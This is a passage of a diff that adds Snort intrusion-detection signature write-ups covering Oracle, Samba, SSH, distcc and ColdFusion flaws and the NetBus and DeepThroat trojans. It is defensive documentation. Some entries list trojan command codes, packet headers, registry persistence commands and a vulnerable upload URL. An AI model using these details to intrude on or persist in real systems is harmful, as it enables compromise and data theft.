+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "APP[path][applications]" parameter in the "Bs_Faq.class.php" script used by the "BlueShoes" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BlueShoes
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2496.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2496
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft RPC service.
+
+--
+Impact:
+Denial of Service (DoS). Possible execution of arbitrary code leading to
+unauthorized remote access to the victim host.
+
+--
+Detailed Information:
+It may be possible for an attacker to cause a DoS condition in the
+Microsoft RPC service when multiple simultaneous requests are made to a
+vulnerable host. This can lead to an exhaustion of system resources
+causing the DoS.
+
+--
+Affected Systems:
+	Windows systems running RPC services
+
+--
+Attack Scenarios:
+An attacker may attempt to bind to the RPC service many times in an
+attempt to cause the DoS condition to occur.
+
+--
+Ease of Attack:
+Difficult.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1663.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+1663
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+PacketStorm:
+http://packetstormsecurity.org/new-exploits/perliis.txt
+
+--
--- /dev/null
+++ b/doc/signatures/2842.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2842
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_snapshot_repgroup
+. This procedure is included in
+sys.dbms_repcat_sna_utl.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1327.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+1327
+
+--
+Summary:
+Secure Shell (SSH) is used to remotely manage systems over encrypted TCP
+sessions. This event is generated when an attempt is made to exploit 
+vulnerable versions of the SSH daemon.
+
+--
+Impact:
+System compromize presenting the attacker with root privileges. Denial 
+of Service (DoS) on certain network devices.
+
+--
+Detailed Information:
+A flaw in the CRC32 compensation attack detection code may result in 
+arbitrary code execution with the privileges of the user running the SSH
+daemon (usually root).
+
+Some Netscreen devices may suffer a Denial of Service.
+
+Affected Systems:
+	OpenSSH versions prior to 2.2
+	Multiple Cisco network devices
+	Multiple Netscreen network devices
+	SSH Secure Communications prior to 1.2.31
+
+--
+Attack Scenarios:
+The attacker would need to send specially crafted large SSH packets to 
+cause the overflow and present the opportunity to write values to memory
+locations.
+
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.kb.cert.org/vuls/id/945216
+
+Analysis by David Dittrich:
+http://staff.washington.edu/dittrich/misc/ssh-analysis.txt
+
+--
--- /dev/null
+++ b/doc/signatures/2685.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2685
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_column
+. This procedure is included in
+sys.dbms_repcat_rq.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1236.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1236
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3032.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3032
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000804.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000804
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BosClassifieds" application running on a webserver. Access to the file "account.php" using a remote file being passed as the "insPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "insPath" parameter in the "account.php" script used by the "BosClassifieds" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BosClassifieds
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2431.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2431
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ISC INN Usenet/NNTP server.
+
+--
+Impact:
+Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+A vulnerability exists in the network news transport protocol server
+from ISC. It may be possible for a remote attacker to exploit a buffer
+overflow condition in the software to execute code of the attackers
+choosing with the privileges of the user running the daemon.
+
+--
+Affected Systems:
+	ISC INN 2.4 .0
+
+--
+Attack Scenarios:
+An attacker may send specially crafted packets to a vulnerable system to
+cause the overflow condition to occur. Once successful the attacker may
+attempt to escalate privileges by using further local exploits.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/151.txt
@@ -0,0 +1,86 @@
+Rule:  
+
+--
+Sid:
+151
+
+--
+Summary:
+This rule has been placed in deleted.rules
+
+--
+Impact:
+A remote attacker with DeepThroat access has almost full control of the
+trojaned machine, including file manipulation and download, keystroke
+logging, password scavenging, and reboot. Additionally, the trojan includes 
+a port redirector, and IRC bot, and a tool to scan for other DeepThroat
+infected machines. There are also prank-type annoyances.
+
+--
+Detailed Information:
+DeepThroat is a full-featured remote access trojan.It contains many kiddie
+tools, including window enumeration and manipulation; file searching
+launching and deletion; remote graphics display sound playing and wallpaper
+alteration; remote website launching and file download; shell alteration 
+(e.g. hiding systray or Start button), CD-ROM open/closing, mouse button 
+swapping; screen resolution change, display on/off; password scavenging and
+screen capturing. It also includes a remotely activated FTP server, a keystroke
+logger, an IRC bot, a port redirector, and a tool to scan for other DeepThroat 
+servers. Using these tools, an attacker can not only take control of the 
+infected machine, but can use it as a relay to attack others or scan
+for more infected machines from within your network.  By default, DeepThroat sends its 
+control commands to port 2140 on the trojaned machine.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+Users must be actively enticed into installing the trojan, using any of the
+normal social-engineering means. Alternatively, an attacker with physical
+access to the machine could simply install it himself.
+
+--
+Ease of Attack:
+Very simple. This is a point-and-click tool. The toughest part is convincing 
+a user to install it, and it could certainly be bound to another binary for 
+easier social-engineering.
+
+--
+False Positives:
+None Known
+
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Mitigation:
+Block UDP port 2140 (standard DeepThroat control port), if possible TCP port 21
+(standard DeepThroat FTP server), and TCP port 999 (DeepThroat keyboard logger). 
+DeepThroat may be set up to run on other ports than those listed above. Removal 
+is the only sure mitigation.
+
+Removal:
+Scan with an anti-virus tool and follow the removal instructions.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+pbsarnac@ThoughtWorks.com	Initial Research
+Josh Gray			Edits
+-- 
+Additional References:
+Packet dump:
+0000  00 50 56 ff ae cb 00 50  56 fe 18 10 08 00 45 00
+0010  00 1e 30 02 00 00 80 11  b4 71 c0 a8 ea 84 c0 a8
+0020  ea 85 ea 60 08 5c 00 0a  85 8e 31 33 02 b0 c0 a8
+0030  ea 84 00 8a 00 bb 00 00  20 46 48 45            
+
+
+--
--- /dev/null
+++ b/doc/signatures/1076.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1076
+
+--
+Summary:
+This event is generated when an attempt is made to access the repost.asp file.
+
+--
+Impact:
+File upload.  This attack may permit an attacker to upload files to the /users directory on the vulnerable server. 
+
+--
+Detailed Information:
+Microsoft Site Server is software for Windows NT servers that allows users to publish, find, and share information.  A vulnerability exists when accessing the repost.asp file, allowing an attacker to upload files to the /users directory of the vulnerable server if access permissions have not been restricted.
+
+--
+Affected Systems:
+Microsoft Site Server 2.0.
+
+--
+Attack Scenarios:
+An attacker can access the respost.asp file, permitting the unauthorized upload of files to the /users directory.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Restrict access permissions on the /users directory.
+
+--
+Contributors:
+Original rute writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=10372
+
+
+--
--- /dev/null
+++ b/doc/signatures/115.txt
@@ -0,0 +1,161 @@
+Rule:
+
+--
+Sid:
+115
+
+--
+Summary:
+This event is generated when the victim confirms the connection request 
+sent by the attacker using the NetBus Pro 2.0 trojan.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine. This Trojan
+also has the ability to scan machines and networks for open ports, it
+can also redirect legitimate traffic to other destinations. It can turn
+the infected host into an open proxy server.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+The Trojan changes system registry settings to add the Netbus sever to
+programs normally started on boot. Due to the nature of this Trojan it
+is unlikely that the attacker's client IP address has been spoofed.
+
+	SID	Message
+	---	-------
+	109	netbus active (outgoing TCP connection)
+	110	netbus getinfo (incoming TCP connection)
+	115	netbus active (outgoing TCP connection)
+
+Server ports usually opened may be one of the following depending on the
+version of netbus: 12345, 12346, 20034
+
+NetBus Pro 2.0 incorporates its own protocol. It uses port 20034 by
+defualt, but it can be changed by the attacker. Packet data includes a
+ten byte header followed by the packet's encrypted data. The first two
+bytes of the header are static: 42 4E.  The next two bytes indicate the
+size of the packet, followed by two bytes for the version number,
+followed by two random bytes, and the final ninth and tenth byte make up
+the command code. To look for an attack from one of these functions, the
+header of the suspicious packet will look like: 42 4E S1 S2 V1 V2 R1 R2 C1 C2
+
+NOTE: S1 and S2 are size byte one and size byte two. V1 and V2 are
+version number byte one and version number byte two. R1 and R2 are
+random bytes one and two. C1 and C2 are the command code bytes.
+
+The following is a list of the command codes for many of Net Bus Pro 2.0's functions:
+
+	Capture Desktop Image: 41 01
+	CDROM Open and Close: 60 01
+	Client Chat: 08 00
+	Execute File: 30 01
+	Reading Directory Listing: 50 00
+	Directory Traversal: 51 00
+	Go To URL: 33 01
+	Keyboard Tricks: 61 01
+	Keylogger: 40 01
+	Mouse Tricks: 65 01
+	Open Document: 33 01
+	Play Sound: 31 01
+	Plugin Manager: 90 00
+	Print Document: 34 01
+	Record Sound: 43 01
+	Redirect Application: 10 01
+	Redirect Port: 00 01
+	Registry Manager: 70 00
+	Remote Control: 73 01 and 72 01
+	Send Message: 40 00
+	Send Text: 64 01
+	Show Image: 32 01
+	Sound System: 80 00
+	System Administrator: 21 00
+	System Information: 30 00
+	Windows Manager: 60 00
+	Any Windows Exit Function(Shutdown, Reboot, etc.): 50 01
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+The manual removal of this Trojan should only be attempted by an
+experienced Windows system administrator.
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
+
+Registry keys added include:
+
+	Netbus Server Pro
+	PATCH "C:\windows\patch.exe /nomsg" - note: the entry may not necessarily be called PATCH
+	NetBuster = ""
+	SysCopy = "command /c copy %windir%\\keyhook.dl_ %windir%\\*.dll /Y"
+	Rundll32 = "rundll.dl_ /noadd"
+	Rundll = "regedit /s nbsetup2.reg"
+
+Later versions may also add one of these registry entries:
+
+	HKEY_LOCAL_MACHINE/SOFTWARE/UltraAccess Networks/NetBus Server/
+	HKEY_CURRENT_USER/NetBus Server/
+
+These entries should be deleted.
+
+The files rundll.dl_ (note the underscore, this is important) and
+nbsetup2.reg should be deleted if they exist.
+
+Ending the process is necessary. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Ricky Macatee <rmacatee@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS401
+http://www.whitehats.com/info/IDS403
+
+Hackfix.org
+http://www.hackfix.org/netbusfix/index.shtml
+
+Dark-e Trojan Archive
+http://www.dark-e.com/archive/trojans/netbus/index.html
+
+--
--- /dev/null
+++ b/doc/signatures/610.txt
@@ -0,0 +1,57 @@
+Rule: 
+
+--
+Sid: 610
+
+--
+Summary: 
+This event is generated when an attempt to login as the superuser is attempted using rsh.
+
+--
+Impact: 
+Serious. If successful the attacker may have gained superuser access to the host.
+
+--
+Detailed Information: 
+This rule generates an event when a connection is made using "rsh" with the username "root". Such activity is indicative of attempts to abuse insecure machines with a known default configuration. 
+
+Some UNIX systems use the "rsh" daemon which permits remote "root" logins. This may allow an attacker to connect to the machine and establish an interactive session.
+
+--
+Attack Scenarios: 
+An attacker finds a machine with the "rsh" service running and connects to it, then proceeds to guess the "root" password
+
+--
+Ease of Attack:
+Simple, no exploit software required
+
+--
+False Positives: 
+A system administrator may be logging in to a host using the username "root"
+
+--
+False Negatives: 
+If a local username is not the same as the remote one ("root"), the rule will not generate an event.
+
+--
+Corrective Action: 
+Investigate logs on the target host for further details and more signs of suspicious activity
+
+Use ssh for remote access instead of rsh.
+
+Deny remote root logins to the host, use a normal user and "sudo" or give the user the ability to "su" to root where appropriate.
+
+--
+Contributors:
+Original rule by Max Vision <vision@whitehats.com> modified from a signature written by Ron Gula
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS391
+
+--
--- /dev/null
+++ b/doc/signatures/3061.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+3061
+
+--
+Summary:
+This event is generated when an attempt is made to connect to the distcc
+daemon.
+
+--
+Impact:
+Serious. Execution of arbitrary commands may be possible.
+
+--
+Detailed Information:
+Distcc is an open source distributed C/C++ compiler that can be used
+to compile code on remote hosts that run the distcc daemon.  A vulnerability
+exists in the handling of commands that are generated via a distcc client.  The
+server does not ensure that compile commands only are sent to it.  A command
+sequence can be created that executes commands on a vulnerable server.  No
+authentication is required to execute a command on a distcc server.
+
+--
+Affected Systems:
+	2.18.3 and prior
+
+--
+Attack Scenarios:
+An attacker can generated a valid distcc command sequence that executes
+a command other than a compile on a vulnerable distcc server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+This is a policy rule and requires proper customization for the
+variable $EXTERNAL_NET for sites that allow distcc traffic from
+remote hosts.  The $EXTERNAL_NET variable should be replaced with
+the IP address(es) of unauthorized client hosts only.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use the --allow <hosts> option when starting the distcc daemon
+to specify authorized client hosts.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/907.txt
@@ -0,0 +1,79 @@
+Rule:
+
+--
+Sid:
+907
+
+--
+Summary:
+This event is generated when an attempt is made to access an Example 
+application on a Coldfusion 4.x server. The 'Web Publish Example Script'
+can be exploited to allow the attacker to upload an arbitrary file to 
+the server.
+
+--
+Impact:
+Serious. The vulnerability allows custom code to be uploaded to the 
+server.
+
+--
+Detailed Information:
+ColdFusion (Macromedia, formerly Allaire) web servers have several
+default Example applications installed that have vulnerabilities.  The
+'Web Publish Example script' application can be exploited to allow the
+uploading of arbitrary files.
+
+See Macromedia Security Bulletin (MPSB01-08) for complete information.
+
+--
+Affected Systems:
+	ColdFusion versions 2.x, 3.x, 4.x for Windows
+	ColdFusion versions 4.x for Solaris, HP-UX
+	ColdFusion versions 4.5.x for Linux
+	Expression Evaluator Patch (ASB99-01)
+
+--
+Attack Scenarios:
+The web application allows file uploading via a URL like this:
+
+http://www.target.com/CFDOCS/exampleapps/publish/admin/addcontent.cfm
+
+Once the file has been uploaded, it can be executed by crafting a 2nd
+URL to the uploaded file.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If ColdFusion 4.x's example code is being used, This rule will generate 
+an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Delete all example code.  This is one of several significant
+vulnerabilities that are exploitable if the example code is left on a
+production server.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Darryl Davidson <ddavidson@talisman-intl.com>
+
+-- 
+Additional References:
+
+Macromedia Security Bulletin (MPSB01-08)
+http://www.macromedia.com/devnet/security/security_zone/mpsb01-08.html
+
+CAN-2001-0535
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0535
+
+--
--- /dev/null
+++ b/doc/signatures/2314.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2314
+
+--
+Summary:
+This event is generated when suspicious shell code is detected in
+network traffic.
+
+--
+Impact:
+Denial of Service (DoS) possible execution of arbitrary code.
+
+--
+Detailed Information:
+This event is generated when suspicious shell code is detected. Many
+buffer overflow attacks contain large numbers of NOOP instrucions to pad
+out the request. Other attacks contain specific shell code sequences
+directed at certain applications or services.
+
+The shellcode in question may also use Unicode encoding.
+
+--
+Affected Systems:
+	Any software running on x86 architecture.
+
+--
+Attack Scenarios:
+An attacker may exploit a DCERPC service by sending shellcode in the RPC
+data stream. Sending large amounts of data to the Microsoft Workstation
+service can cause a buffer overflow condition in the logging function
+thus presenting an attacker with the opportunity to issue a DoS attack
+or in some cases, to execute code of their choosing.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+False positives may be generated by binary file transfers.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Make sure the target host has all current patches applied and has the
+latest software versions installed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/416.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+
+Sid:
+416
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Information Reply datagram with an undefined ICMP Code.
+
+--
+
+Impact:
+ICMP Information Reply datagrams contain the network number of the network segment the datagram was generated on.  This could be an indication of an improperly configured host attempting to locate the network number of the subnet it is located in.
+
+Undefined ICMP Code values should never been seen on the network.  This could be an indication of nefarious activity on the network.
+
+--
+
+Detailed Information:
+This message is generated in response to an ICMP Information Request Message.  Hosts that generated ICMP Information Request Messages are attempting to obtain the network number of subnet it is on.  In normal situations the ICMP Code should be set to 0, values other than 0 are undefined and should never be used.
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+ICMP Type 16 datagrams are not normal network activity.  Hosts generating ICMP Information Request messages or Information Reply Messages should be checked for configuration errors.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/2795.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2795
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure refresh_snapshot_repgroup
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
